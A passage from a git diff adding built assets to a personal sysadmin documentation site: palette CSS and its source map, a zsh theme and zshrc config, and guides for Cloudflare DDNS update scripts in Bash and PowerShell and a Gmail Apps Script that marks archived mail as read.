1975d2;--md-primary-bg-color:#fff;--md-primary-bg-color--light:#ffffffb3}[data-md-color-primary=light-blue]{--md-primary-fg-color:#02a6f2;-
-md-primary-fg-color--light:#28b5f6;--md-primary-fg-color--dark:#0287cf;--md-primary-bg-color:#fff;--md-primary-bg-color--light:#ffffffb3}[data-md-color-primary=cyan]{--md-primary-fg-color:#00bdd6;--md-primary-fg-color--light:#25c5da;--md-primary-fg-color--dark:#0097a8;--md-primary-bg-color:#fff;--md-primary-bg-color--light:#ffffffb3}[data-md-color-primary=teal]{--md-primary-fg-color:#009485;--md-primary-fg-color--light:#26a699;--md-primary-fg-color--dark:#007a6c;--md-primary-bg-color:#fff;--md-primary-bg-color--light:#ffffffb3}[data-md-color-primary=green]{--md-primary-fg-color:#4cae4f;--md-primary-fg-color--light:#68bb6c;--md-primary-fg-color--dark:#398e3d;--md-primary-bg-color:#fff;--md-primary-bg-color--light:#ffffffb3}[data-md-color-primary=light-green]{--md-primary-fg-color:#8bc34b;--md-primary-fg-color--light:#9ccc66;--md-primary-fg-color--dark:#689f38;--md-primary-bg-color:#fff;--md-primary-bg-color--light:#ffffffb3}[data-md-color-primary=lime]{--md-primary-fg-color:#cbdc38;--md-primary-fg-color--light:#d3e156;--md-primary-fg-color--dark:#b0b52c;--md-primary-bg-color:#000000de;--md-primary-bg-color--light:#0000008a}[data-md-color-primary=yellow]{--md-primary-fg-color:#ffec3d;--md-primary-fg-color--light:#ffee57;--md-primary-fg-color--dark:#fbc02d;--md-primary-bg-color:#000000de;--md-primary-bg-color--light:#0000008a}[data-md-color-primary=amber]{--md-primary-fg-color:#ffc105;--md-primary-fg-color--light:#ffc929;--md-primary-fg-color--dark:#ffa200;--md-primary-bg-color:#000000de;--md-primary-bg-color--light:#0000008a}[data-md-color-primary=orange]{--md-primary-fg-color:#ffa724;--md-primary-fg-color--light:#ffa724;--md-primary-fg-color--dark:#fa8900;--md-primary-bg-color:#000000de;--md-primary-bg-color--light:#0000008a}[data-md-color-primary=deep-orange]{--md-primary-fg-color:#ff6e42;--md-primary-fg-color--light:#ff8a66;--md-primary-fg-color--dark:#f4511f;--md-primary-bg-color:#fff;--md-primary-bg-color--light:#ffffffb3}[data-md-color-primary=brown]{--md-prima
ry-fg-color:#795649;--md-primary-fg-color--light:#8d6e62;--md-primary-fg-color--dark:#5d4037;--md-primary-bg-color:#fff;--md-primary-bg-color--light:#ffffffb3}[data-md-color-primary=grey]{--md-primary-fg-color:#757575;--md-primary-fg-color--light:#9e9e9e;--md-primary-fg-color--dark:#616161;--md-primary-bg-color:#fff;--md-primary-bg-color--light:#ffffffb3;--md-typeset-a-color:#4051b5}[data-md-color-primary=blue-grey]{--md-primary-fg-color:#546d78;--md-primary-fg-color--light:#607c8a;--md-primary-fg-color--dark:#455a63;--md-primary-bg-color:#fff;--md-primary-bg-color--light:#ffffffb3;--md-typeset-a-color:#4051b5}[data-md-color-primary=light-green]:not([data-md-color-scheme=slate]){--md-typeset-a-color:#72ad2e}[data-md-color-primary=lime]:not([data-md-color-scheme=slate]){--md-typeset-a-color:#8b990a}[data-md-color-primary=yellow]:not([data-md-color-scheme=slate]){--md-typeset-a-color:#b8a500}[data-md-color-primary=amber]:not([data-md-color-scheme=slate]){--md-typeset-a-color:#d19d00}[data-md-color-primary=orange]:not([data-md-color-scheme=slate]){--md-typeset-a-color:#e68a00}[data-md-color-primary=white]{--md-primary-fg-color:#fff;--md-primary-fg-color--light:#ffffffb3;--md-primary-fg-color--dark:#00000012;--md-primary-bg-color:#000000de;--md-primary-bg-color--light:#0000008a;--md-typeset-a-color:#4051b5}[data-md-color-primary=white] .md-button{color:var(--md-typeset-a-color)}[data-md-color-primary=white] .md-button--primary{background-color:var(--md-typeset-a-color);border-color:var(--md-typeset-a-color);color:#fff}@media screen and (min-width:60em){[data-md-color-primary=white] .md-search__form{background-color:#00000012}[data-md-color-primary=white] .md-search__form:hover{background-color:#00000052}[data-md-color-primary=white] .md-search__input+.md-search__icon{color:#000000de}}@media screen and (min-width:76.25em){[data-md-color-primary=white] .md-tabs{border-bottom:.05rem solid 
#00000012}}[data-md-color-primary=black]{--md-primary-fg-color:#000;--md-primary-fg-color--light:#0000008a;--md-primary-fg-color--dark:#000;--md-primary-bg-color:#fff;--md-primary-bg-color--light:#ffffffb3;--md-typeset-a-color:#4051b5}[data-md-color-primary=black] .md-button{color:var(--md-typeset-a-color)}[data-md-color-primary=black] .md-button--primary{background-color:var(--md-typeset-a-color);border-color:var(--md-typeset-a-color);color:#fff}[data-md-color-primary=black] .md-header{background-color:#000}@media screen and (max-width:59.9375em){[data-md-color-primary=black] .md-nav__source{background-color:#000000de}}@media screen and (min-width:60em){[data-md-color-primary=black] .md-search__form{background-color:#ffffff1f}[data-md-color-primary=black] .md-search__form:hover{background-color:#ffffff4d}}@media screen and (max-width:76.1875em){html [data-md-color-primary=black] .md-nav--primary .md-nav__title[for=__drawer]{background-color:#000}}@media screen and (min-width:76.25em){[data-md-color-primary=black] .md-tabs{background-color:#000}}
\ No newline at end of file
diff --git a/assets/stylesheets/palette.ecc896b0.min.css.map b/assets/stylesheets/palette.ecc896b0.min.css.map
new file mode 100644
index 000000000..d616c2a6d
--- /dev/null
+++ b/assets/stylesheets/palette.ecc896b0.min.css.map
@@ -0,0 +1 @@
+{"version":3,"sources":["src/assets/stylesheets/palette/_scheme.scss","../../../src/assets/stylesheets/palette.scss","src/assets/stylesheets/palette/_accent.scss","src/assets/stylesheets/palette/_primary.scss","src/assets/stylesheets/utilities/_break.scss"],"names":[],"mappings":"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","file":"palette.css"}
\ No newline at end of file
diff --git a/assets/zsh/3os.zsh-theme b/assets/zsh/3os.zsh-theme
new file mode 100644
index 000000000..a5b2ccd32
--- /dev/null
+++ b/assets/zsh/3os.zsh-theme
@@ -0,0 +1,32 @@
+local return_code="%(?..%{$fg[red]%}%? ↵%{$reset_color%})"
+local user_host="(%B%(!.%{$fg[red]%}.%{$fg[green]%})%n@%m%{$reset_color%}) "
+local user_symbol='%(!.#.$)'
+local current_dir="[%B%{$fg[blue]%}%~%{$reset_color%}] "
+
+local vcs_branch='$(git_prompt_info)$(hg_prompt_info)'
+local rvm_ruby='$(ruby_prompt_info)'
+local venv_prompt='$(virtualenv_prompt_info)'
+
+ZSH_THEME_RVM_PROMPT_OPTIONS="i v g"
+
+PROMPT="┌──${user_host}${current_dir}${rvm_ruby}${vcs_branch}${venv_prompt} [%*]
+└─%B${user_symbol}%b "
+RPROMPT="%B${return_code}%b"
+
+ZSH_THEME_GIT_PROMPT_PREFIX="[%{$fg[yellow]%}"
+ZSH_THEME_GIT_PROMPT_SUFFIX="%{$reset_color%}]"
+ZSH_THEME_GIT_PROMPT_DIRTY=" %{$fg[red]%}✗%{$reset_color%}"
+ZSH_THEME_GIT_PROMPT_CLEAN=" %{$fg[green]%}✔%{$reset_color%}"
+
+ZSH_THEME_HG_PROMPT_PREFIX="$ZSH_THEME_GIT_PROMPT_PREFIX"
+ZSH_THEME_HG_PROMPT_SUFFIX="$ZSH_THEME_GIT_PROMPT_SUFFIX"
+ZSH_THEME_HG_PROMPT_DIRTY="$ZSH_THEME_GIT_PROMPT_DIRTY"
+ZSH_THEME_HG_PROMPT_CLEAN="$ZSH_THEME_GIT_PROMPT_CLEAN"
+
+ZSH_THEME_RUBY_PROMPT_PREFIX="%{$fg[red]%}‹"
+ZSH_THEME_RUBY_PROMPT_SUFFIX="› %{$reset_color%}"
+
+ZSH_THEME_VIRTUAL_ENV_PROMPT_PREFIX=" (%{$fg[green]%}"
+ZSH_THEME_VIRTUAL_ENV_PROMPT_SUFFIX="%{$reset_color%})"
+ZSH_THEME_VIRTUALENV_PREFIX="$ZSH_THEME_VIRTUAL_ENV_PROMPT_PREFIX"
+ZSH_THEME_VIRTUALENV_SUFFIX="$ZSH_THEME_VIRTUAL_ENV_PROMPT_SUFFIX"
diff --git a/assets/zsh/zshrc_config b/assets/zsh/zshrc_config
new file mode 100644
index 000000000..5516c44d2
--- /dev/null
+++ b/assets/zsh/zshrc_config
@@ -0,0 +1,111 @@
+# If you come from bash you might have to change your $PATH.
+# export PATH=$HOME/bin:/usr/local/bin:$PATH
+
+# Path to your oh-my-zsh installation.
+export ZSH="$HOME/.oh-my-zsh"
+
+# Set name of the theme to load --- if set to "random", it will
+# load a random theme each time oh-my-zsh is loaded, in which case,
+# to know which specific one was loaded, run: echo $RANDOM_THEME
+# See https://github.com/ohmyzsh/ohmyzsh/wiki/Themes
+ZSH_THEME="3os"
+
+# Set list of themes to pick from when loading at random
+# Setting this variable when ZSH_THEME=random will cause zsh to load
+# a theme from this variable instead of looking in $ZSH/themes/
+# If set to an empty array, this variable will have no effect.
+# ZSH_THEME_RANDOM_CANDIDATES=( "robbyrussell" "agnoster" )
+
+# Uncomment the following line to use case-sensitive completion.
+# CASE_SENSITIVE="true"
+
+# Uncomment the following line to use hyphen-insensitive completion.
+# Case-sensitive completion must be off. _ and - will be interchangeable.
+# HYPHEN_INSENSITIVE="true"
+
+# Uncomment the following line to disable bi-weekly auto-update checks.
+# DISABLE_AUTO_UPDATE="true"
+
+# Uncomment the following line to automatically update without prompting.
+# DISABLE_UPDATE_PROMPT="true"
+
+# Uncomment the following line to change how often to auto-update (in days).
+# export UPDATE_ZSH_DAYS=13
+
+# Uncomment the following line if pasting URLs and other text is messed up.
+# DISABLE_MAGIC_FUNCTIONS="true"
+
+# Uncomment the following line to disable colors in ls.
+# DISABLE_LS_COLORS="true"
+
+# Uncomment the following line to disable auto-setting terminal title.
+# DISABLE_AUTO_TITLE="true"
+
+# Uncomment the following line to enable command auto-correction.
+# ENABLE_CORRECTION="true"
+
+# Uncomment the following line to display red dots whilst waiting for completion.
+# Caution: this setting can cause issues with multiline prompts (zsh 5.7.1 and newer seem to work)
+# See https://github.com/ohmyzsh/ohmyzsh/issues/5765
+# COMPLETION_WAITING_DOTS="true"
+
+# Uncomment the following line if you want to disable marking untracked files
+# under VCS as dirty. This makes repository status check for large repositories
+# much, much faster.
+# DISABLE_UNTRACKED_FILES_DIRTY="true"
+
+# Uncomment the following line if you want to change the command execution time
+# stamp shown in the history command output.
+# You can set one of the optional three formats:
+# "mm/dd/yyyy"|"dd.mm.yyyy"|"yyyy-mm-dd"
+# or set a custom format using the strftime function format specifications,
+# see 'man strftime' for details.
+# HIST_STAMPS="mm/dd/yyyy"
+
+# Would you like to use another custom folder than $ZSH/custom?
+# ZSH_CUSTOM=/path/to/new-custom-folder
+
+# Which plugins would you like to load?
+# Standard plugins can be found in $ZSH/plugins/
+# Custom plugins may be added to $ZSH_CUSTOM/plugins/
+# Example format: plugins=(rails git textmate ruby lighthouse)
+# Add wisely, as too many plugins slow down shell startup.
+plugins=(git colored-man-pages docker docker-compose iterm2 node npm brew colorize macos pip pyenv virtualenv adb aws command-not-found zsh-autosuggestions zsh-syntax-highlighting)
+
+source $ZSH/oh-my-zsh.sh
+
+# User configuration
+
+# export MANPATH="/usr/local/man:$MANPATH"
+
+# You may need to manually set your language environment
+# export LANG=en_US.UTF-8
+
+# Preferred editor for local and remote sessions
+# if [[ -n $SSH_CONNECTION ]]; then
+# export EDITOR='vim'
+# else
+# export EDITOR='mvim'
+# fi
+
+# Compilation flags
+# export ARCHFLAGS="-arch x86_64"
+
+# Set personal aliases, overriding those provided by oh-my-zsh libs,
+# plugins, and themes. Aliases can be placed here, though oh-my-zsh
+# users are encouraged to define aliases within the ZSH_CUSTOM folder.
+# For a full list of active aliases, run `alias`.
+#
+# Example aliases
+# alias zshconfig="mate ~/.zshrc"
+# alias ohmyzsh="mate ~/.oh-my-zsh"
+
+# Screenfetch
+if which screenfetch >/dev/null; then
+ screenfetch
+fi
+
+## Fix for Slow zsh-autosuggestions copy&paste
+autoload -Uz bracketed-paste-magic
+zle -N bracketed-paste bracketed-paste-magic
+zstyle ':bracketed-paste-magic' active-widgets '.self-*'
diff --git a/automation/ddns-cloudflare-bash/index.html b/automation/ddns-cloudflare-bash/index.html
new file mode 100644
index 000000000..ff6875d04
--- /dev/null
+++ b/automation/ddns-cloudflare-bash/index.html
@@ -0,0 +1,186 @@
+
DDNS Cloudflare Bash - 3os automation cloudflare ddns bash Authors: fire1ce | Created: 2022-04-03 | Last update: 2022-04-03 DDNS Cloudflare Bash Script When building complex infrastructure and managing multiple servers and services, using IP addresses can create a lot of issues and is not always easy to manage. The preferred way is to use a DNS provider that allows you to manage your domain names and their associated IP addresses. DDNS Cloudflare Bash script is a simple bash script that allows you to easily update your Cloudflare's DNS records
dynamically regardless of your current IP address. DDNS Cloudflare Bash Script can be used on Linux, Unix, FreeBSD, and macOS with only one requirement of curl
Source code can be found at DDNS Cloudflare Bash Github Repository .
About DDNS Cloudflare Bash Script for most Linux , Unix distributions and MacOS . Choose any source IP address to update external or internal (WAN/LAN) . For multiple LAN interfaces like Wifi, Docker Networks and Bridges the script will automatically detect the primary Interface by priority. Cloudflare's options proxy and TTL configurable via the config file. Optional Telegram Notifications Requirements curl Cloudflare api-token with ZONE-DNS-EDIT Permissions DNS Record must be pre created (api-token should only edit dns records) Creating Cloudflare API Token To create a CloudFlare API token for your DNS zone go to https://dash.cloudflare.com/profile/api-tokens and follow these steps:
Click Create Token Select Create Custom Token Provide the token a name, for example, example.com-dns-zone-readonly
Grant the token the following permissions: - Zone - DNS - Edit Set the zone resources to: - Include - Specific Zone - example.com
Complete the wizard and use the generated token at the CLOUDFLARE_API_TOKEN
variable for the container Installation You can place the script at any location manually.
MacOS : Don't use the /usr/local/bin/ for the script location. Create a separate folder under your user path /Users/${USER}
The automatic install examples below will place the script at /usr/local/bin/
wget https://raw.githubusercontent.com/fire1ce/DDNS-Cloudflare-Bash/main/update-cloudflare-dns.sh
+sudo chmod +x update-cloudflare-dns.sh
+sudo mv update-cloudflare-dns.sh /usr/local/bin/update-cloudflare-dns
+
Config file You can use default config file update-cloudflare-dns.conf or pass your own config file as parameter to script.
wget https://raw.githubusercontent.com/fire1ce/DDNS-Cloudflare-Bash/main/update-cloudflare-dns.conf
+
Place the config file in the directory as the update-cloudflare-dns for above example at /usr/local/bin/
sudo mv update-cloudflare-dns.conf /usr/local/bin/update-cloudflare-dns.conf
+
Config Parameters Option Example Description what_ip internal Which IP should be used for the record: internal/external dns_record ddns.example.com DNS A record which will be updated, you can pass multiple A records separated by comma cloudflare_zone_api_token ChangeMe Cloudflare API Token KEEP IT PRIVATE!!!! zoneid ChangeMe Cloudflare's Zone ID proxied false Use Cloudflare proxy on dns record true/false ttl 120 120-7200 in seconds or 1 for Auto
Optional Notifications Parameters Option Example Description notify_me_telegram yes Use Telegram notifications yes/no telegram_chat_id ChangeMe Chat ID of the bot telegram_bot_API_Token ChangeMe Telegram's Bot API Token
Running The Script When placed in /usr/local/bin/
With your config file (need to be placed in same folder)
update-cloudflare-dns your_config.conf
+
Or manually
<path>/.update-cloudflare-dns.sh
+
Automation With Crontab You can run the script via crontab
Examples Run every minute
* * * * * /usr/local/bin/update-cloudflare-dns
+
Run with your specific config file
* * * * * /usr/local/bin/update-cloudflare-dns myconfig.conf
+
Run every 2 minutes
*/2 * * * * /usr/local/bin/update-cloudflare-dns
+
Run at boot
@reboot /usr/local/bin/update-cloudflare-dns
+
Run 1 minute after boot
@reboot sleep 60 && /usr/local/bin/update-cloudflare-dns
+
Run at 08:00
0 8 * * * /usr/local/bin/update-cloudflare-dns
+
Logs This Script will create a log file with only the last run information Log file will be located at the script's location.
Example:
/usr/local/bin/update-cloudflare-dns.log
+
Limitations License MIT License Copyright© 3os.org @2020
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NON-INFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
Back to top
\ No newline at end of file
diff --git a/automation/ddns-cloudflare-powershell/index.html b/automation/ddns-cloudflare-powershell/index.html
new file mode 100644
index 000000000..5d5a8154e
--- /dev/null
+++ b/automation/ddns-cloudflare-powershell/index.html
@@ -0,0 +1,172 @@
+
DDNS Cloudflare PowerShell - 3os automation cloudflare ddns powershell Authors: fire1ce | Created: 2022-04-03 | Last update: 2022-04-24 DDNS Cloudflare PowerShell Script When building complex infrastructure and managing multiple servers and services, using IP addresses can create a lot of issues and is not always easy to manage. The preferred way is to use a DNS provider that allows you to manage your domain names and their associated IP addresses. DDNS Cloudflare PowerShell script is a simple PowerShell script that allows you to easily update your Cloudflare's DNS records
dynamically regardless of your current IP address. DDNS Cloudflare PowerShell Script can be used on Windows operating systems without any requirements for PowerShell.
Source code can be found at DDNS Cloudflare PowerShell Github Repository .
DDNS Cloudflare PowerShell script for Windows . Choose any source IP address to update external or internal (WAN/LAN) . For multiple LAN interfaces like Wifi, Docker Networks and Bridges the script will automatically detect the primary Interface by priority. Cloudflare's options for proxy and TTL configurable via the parameters. Optional Telegram or Discord Notifications Requirements Cloudflare api-token with ZONE-DNS-EDIT Permissions DNS Record must be pre created (api-token should only edit dns records) Enabled running unsigned PowerShell Creating Cloudflare API Token To create a CloudFlare API token for your DNS zone go to https://dash.cloudflare.com/profile/api-tokens and follow these steps:
Click Create Token Select Create Custom Token Provide the token a name, for example, example.com-dns-zone-readonly
Grant the token the following permissions: - Zone - DNS - Edit Set the zone resources to: - Include - Specific Zone - example.com
Complete the wizard and use the generated token at the CLOUDFLARE_API_TOKEN
variable for the container Installation Download the DDNS-Cloudflare-PowerShell zip file & Unzip, rename the folder to DDNS-Cloudflare-PowerShell place in a directory of your choosing
Config Parameters Update the config parameters inside the update-cloudflare-dns_conf.ps1 by editing accordingly. See below for examples.
Option Example Description what_ip internal Which IP should be used for the record: internal/external dns_record ddns.example.com DNS A record which will be updated cloudflare_zone_api_token ChangeMe Cloudflare API Token KEEP IT PRIVATE!!!! zoneid ChangeMe Cloudflare's Zone ID proxied false Use Cloudflare proxy on dns record true/false ttl 120 120-7200 in seconds or 1 for Auto
Optional Notifications Parameters for Telegram Option Example Description notify_me_telegram yes Use Telegram notifications yes/no telegram_chat_id ChangeMe Chat ID of the bot telegram_bot_API_Token ChangeMe Telegram's Bot API Token
Optional Notification Parameters for Discord Option Example Description notify_me_discord yes Use Discord notifications yes/no discord_webhook_URL http://WebhookURL.com/asd/ Webhook URL from your Discord server settings
To generate a webhook URL, follow the official Discord instructions .
Running The Script Open cmd/powershell
Example:
powershell.exe -ExecutionPolicy Bypass -File C:\DDNS-Cloudflare-PowerShell\update-cloudflare-dns.ps1
+
Automation With Windows Task Scheduler Example: Run at boot with 1 min delay and repeat every 1 min
Open Task Scheduler Action -> Create Task General Menu Name: update-cloudflare-dns Run whether user is logged on or not Trigger New... Begin the task: At startup Delay task for: 1 minute Repeat task every: 1 minute for duration of: indefinitely Enabled Actions New... Action: Start a Program Program/script: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add arguments: -ExecutionPolicy Bypass -File C:\DDNS-Cloudflare-PowerShell\update-cloudflare-dns.ps1 ok Enter your user's password when prompted Conditions Power: Uncheck - [x] Start the task only if the computer is on AC power Logs This Script will create a log file with only the last run information Log file will be located in the same directory as update-cloudflare-dns.ps1
Log file name:
update-cloudflare-dns.log
+
License MIT License Copyright© 3os.org @2020
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NON-INFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
Back to top
\ No newline at end of file
diff --git a/automation/gmail-mark-archived-mail-as-read/index.html b/automation/gmail-mark-archived-mail-as-read/index.html
new file mode 100644
index 000000000..f29630146
--- /dev/null
+++ b/automation/gmail-mark-archived-mail-as-read/index.html
@@ -0,0 +1,173 @@
+
Gmail Mark Archived as Read - 3os Authors: fire1ce | Created: 2022-04-03 | Last update: 2022-04-24 Automatically Mark Archived Email as Read in Gmail Background My preferred method of managing emails in Gmail is Zero Inbox
. In short, emails in Inbox work as a to-do list. The Inbox may contain important email I need to attend to or a digital receipt from a payment I've made a minute ago. Since I know the content of that email the task is done and I archive it. This email will move from Inbox to All Mail or a dedicated label if you have automation rules.
The Problem When using the Archive
function email which weren't opened or marked as Read
will show as number counter in All Mail or Dedicated Label. Since I'm done with those emails I have to manually mark emails as read. This is a tedious task and I don't want to do it manually
The Solution Using Google Scripts We can create a personal app
that will automatically mark emails as read when they are archived. This is a simple script that will run on Gmail and will mark emails as read when they are no longer in the inbox folder. You can choose how often you want to automatically mark archived email as read in gmail. This solution was tested on personal Gmail accounts and the Google Workspace Gmail accounts (as long as you can grant permission).
Installation Make sure you are logged in to your Google account. Open Google Scripts and create a new project.
You will be prompted with a new window. Rename the project to Automatically Mark Archived Email as Read
. Copy and replace the following code to the new project.
function markArchivedAsRead () {
+ var threads = GmailApp . search ( 'label:unread -label:inbox' , 0 , 100 );
+ GmailApp . markThreadsRead ( threads );
+ var spamThreads = GmailApp . search ( 'label:spam -label:inbox' , 0 , 100 );
+ GmailApp . markThreadsRead ( spamThreads );
+}
+
Your window should look like this:
Save the project.
After saving the project you should be able Run the script.
On the first run the script will ask you to give it the necessary permissions. Click Review permissions
to continue.
Since the app
is not signed you will be prompted with a warning. It's ok and safe. Click Advanced
.
Click Go to Gmail Mark Archived as Read (unsafe)
to continue.
At this point you will be prompted to grant the script Automatically Mark Archived Email as Read
access to your Gmail account. Click Allow
. This will allow the script to perform the actions you need.
If all went well you should see the log of the script as shown below.
At this point we create a Automatically Mark Archived Email as Read
script and grant it the necessary permissions. Now we want to automate the process. We can do this by creating a new timed trigger. Head over to the Trigger menu
Click Add Trigger
.
You will be prompted to select when and how the script will run. The following example will run the script every 5 minutes, and send a failure email report once a week.
Note
The script may fail once in a while. This is due to the fact it depends on Gmail's API. Unless you receive an email with hundreds of failed attempts, you can ignore the email.
Note
Update: Some people are reporting an error which says "This operation can only be applied to at most 100 threads. (line 3, file "Code")". To fix this, you have to manually do a search for "is:unread" and mark all of them as read before running the script, so that it starts with a clean slate. The script can only process 100 threads per run, so if you give it more than 100 on the first run,
